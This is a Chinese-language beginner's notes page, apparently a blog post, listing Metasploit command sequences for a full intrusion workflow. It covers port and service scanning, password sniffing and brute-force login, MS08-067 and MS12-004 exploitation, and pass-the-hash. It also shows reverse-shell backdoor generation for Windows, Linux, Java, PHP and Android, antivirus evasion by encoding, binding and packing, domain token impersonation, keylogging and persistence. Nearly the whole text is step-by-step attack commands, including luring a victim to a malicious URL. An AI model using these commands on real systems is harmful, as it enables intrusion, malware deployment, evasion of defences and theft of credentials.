小白筆記-----------------------Metasploit (from tools)整理

1、msf更新
命令:./msfupdate
2、nmap掃描
命令:nmap命令
3、msf內置掃描
命令:search portscan
之後調用
show options 顯示設置參數
4、msf SMB獲取系統信息
命令:use auxiliary/scanner/smb/smb_version
5、msf服務識別
命令:ssh:
    use auxiliary/scanner/ssh/ssh_version
      ftp:
    use auxiliary/scanner/ftp/ftp_version
6、密碼嗅探
命令: ftp密碼嗅探:
        use auxiliary/sniffer/psnuffle
7、snmp掃描
命令:search snmp
    use 其中一個
    show options
    完成設置
    snmp枚舉:
    use auxiliary/scanner/snmp/snmp_enum
8、SMB登陸驗證(microsoft 網絡共享協議)
命令:use auxiliary/scanner/smb/smb_lo
9、VNC身份識別(遠程控制)
命令:
     use auxiliary/scanner/vnc/vnc_none_auths
10、wmap web掃描
命令:load wmap
    wmap_sites
    查看參數
    wmap_sites -l
    查看結果
    wamp_targets -h
    設置參數
    wmap_targets -l
    查看結果
    wmap_run -h
    wmap_run -t (進行掃描)
    wmap_run -e (進行測試)
    查看掃描結果
    wmap_vulns -l
11、遠程代碼執行
漏洞:MS08_067
命令:search 08_067
    use exploit/windows/smb/ms08_067_netapi
    設置參數,選擇載荷
    set paload reverse_tcp(非常常用的載荷)
    設置目標版本號
    set target
12、MIDI文件解析遠程代碼執行
漏洞:ms12_004
命令:use (調用一下)
    show options
    exploit (生成url)
    set url(修改url)
    讓對方訪問url
    sessions(查看會話)
    sessions -i 1(獲得會話)
13、口令安全
命令:search mysql_login(mysql 服務)
    use
    show options
    set USERNAME
    set PASS_FILE
    search ssh_login(ssh 服務)
    操作類似

14、Hash值傳遞參數
命令:在不知道密碼的情況下:
    知道密碼的情況下;
    use exploit/windows/smb/psexec
    進行設置
    exploit
    hashdump(獲取hash值)
    set smbpass +hash值(可以直接用hash值登陸)
15、NDProxy內核提權
命令:建立會話之後
    search ms14_002
    用這個漏洞提升自己的權限
    set session 1
    exploit 攻擊
16、多種後門生成
命令:主要是用payloads
    msfpayload windows/meterpreter/reverse_tcp LHOST= **** LPORT=*** x
    >/ ***.exe
    生成了後門
將後門放到目標機器中
    在msf中有一個監聽的程序
    search handler
    use exploit/multi/handler
    show options
    set payload 設置剛剛的payload     windows/meterpreter/reverse_tcp
    配置一下參數,設置端口和ip
    在目標機子上運行後門,反彈一個shell
linux後門:
    msfpayload linux/x86/shell_reverse_tcp LHOST=**
LPORT=*** x>linux
    給他權限,
    ./linux
    同時還要監聽相應的端口
生成java後門:
     msfpayload java/meterpreter/reverse_tcp LHOST=** LPORT=**
    w>123.jar
生成php後門:
    msfpayload php/meterpreter/reverse_tcp LHOST=*** LPORT=**
R | msfencode -e php/base64 -t raw -o 1.php
生成android後門:
    msfpayload android/meterpreter/reverse_tcp LHOST=*8 LPORT=**
    R>1.apk
17、內網滲透
命令:獲得shell
    掃描c段
    run get_local_subnets
    查看域環境
    use incognito
    list_tokens -u
    impersonate_token (獲得域管理的權限)
    shell(進入域管理shell)
    如果沒有域管理
18、反反病毒(免殺)
    1、加殼
    2、用匯編的方法改變
命令:    先生成後門
    msfpayload windows/shell/reverese_tcp LHOST=** LPORT=**
    R | msfencode -e x86/shikata_ga_nai -t exe >123.exe
    用編碼的方式來免殺
    調用多個編碼進行多次免殺
    msfencode -L(查看可用編碼,有的編碼可以重複使用)
    msfpayload windows/meterprter/reverse_tcp LHOST=** LPORT=**
    R | msfencode -e x86/shikata_ga_nai -c 10 -t exe>123.exe
    綁定正常文件
    msfpayload windows/shell/reverese_tcp LHOST=** LPORT=**
    R | msfencode -e x86/shikata_ga_nai -t exe -x /root/ftp.exe -o 123.exe
    加殼
    upx - 5 /123.exe
19、XSS
命令:    search keylogger
    use 其中一個
    set DEMO true
    set URLPATH
    set srvport
20、維持訪問(後門)
命令: 有一個會話
    run metsvc -A
    use exploit/multi/handler
    set payload windows/metsvc_bind_tcp
    實現主動連接
    keyscan_start (鍵盤記錄)
    keyscan_dump           
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章